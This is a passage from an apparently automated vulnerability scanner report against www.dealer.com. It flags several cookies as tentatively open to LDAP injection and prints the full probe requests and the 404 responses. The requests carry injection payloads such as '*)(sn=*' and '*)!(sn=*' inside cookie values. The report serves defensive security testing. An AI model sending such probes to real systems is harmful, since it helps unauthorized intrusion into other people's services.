com.silverpop.iMA.page_visit./products/lead-management/=*)(sn=*; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002863; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.46.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20215
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:26:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003618; expires=Mon, 16-Apr-2012 01:26:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Dealer.com's backend tool is definitely the best in the industry. I like the simplicity of one login, and how all the webstats are one click away.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We've incorporated more of Dealer.com's products because everything we put in place has worked. I really feel like we've got a partner in Dealer.com. </p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/produc
...[SNIP]...

Request 2

GET /products/inventory-marketing/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/inventory-marketing/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=*)!(sn=*; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002863; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.46.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20189
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003619; expires=Mon, 16-Apr-2012 01:26:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Throughout my first few years here, researching and developing both a website and the Internet Sales Department for this dealership, I have used several nationally known Internet Service Providers (ISP). Dealer.com ended up the clear winner for more reasons than I &#8230;</p>
   <cite>Mike Poulin, Shearer Pontiac Cadillac Hummer</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spo
...[SNIP]...
1.4. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif [exp_last_visit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/call-tracking/media/uploads/page/loading.gif

Issue detail

The exp_last_visit cookie appears to be vulnerable to LDAP injection attacks.

The payloads 714ccbf8941beef9)(sn=* and 714ccbf8941beef9)!(sn=* were each submitted in the exp_last_visit cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/call-tracking/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=714ccbf8941beef9)(sn=*; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002857; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Flvlc%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.42.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19951
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:15:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002958; expires=Mon, 16-Apr-2012 01:15:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com has lived up to every one of their promises.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight
...[SNIP]...

Request 2

GET /products/lead-management/call-tracking/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=714ccbf8941beef9)!(sn=*; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002857; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Flvlc%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.42.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20054
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:15:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002959; expires=Mon, 16-Apr-2012 01:15:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversio
...[SNIP]...
1.5. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=*)(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002983; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.47.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20312
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003738; expires=Mon, 16-Apr-2012 01:28:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>I don't care who your website provider is, if it's not Dealer.com you need to at least take a look at them. I give them my absolute whole-hearted endorsement. I put my name on it. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>This is an awesome company which just happens to have their headquarters located about 5 minutes away from our dealership. I know their employees personally, I have been inside their building, and I have seen the explosive growth they have achieved. &#8230;</p>
   <cite>John Kimel, Lewis Autos</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>In the 2 years that we have been with Dealer.com, our rankings have drastically improved, and our lead volume has gone up at least 40%.</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Mark
...[SNIP]...

Request 2

GET /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=*)!(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002983; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.47.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20284
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:29:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003739; expires=Mon, 16-Apr-2012 01:28:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>For dealers who want to compete using SEO, they don&#8217;t need to build outside microsites for content anymore. They can do it right inside the Dealer.com platform.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spo
...[SNIP]...
1.6. http://www.dealer.com/products/lead-management/media/uploads/page/loading.gif [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/media/uploads/page/loading.gif

Issue detail

The __utma cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
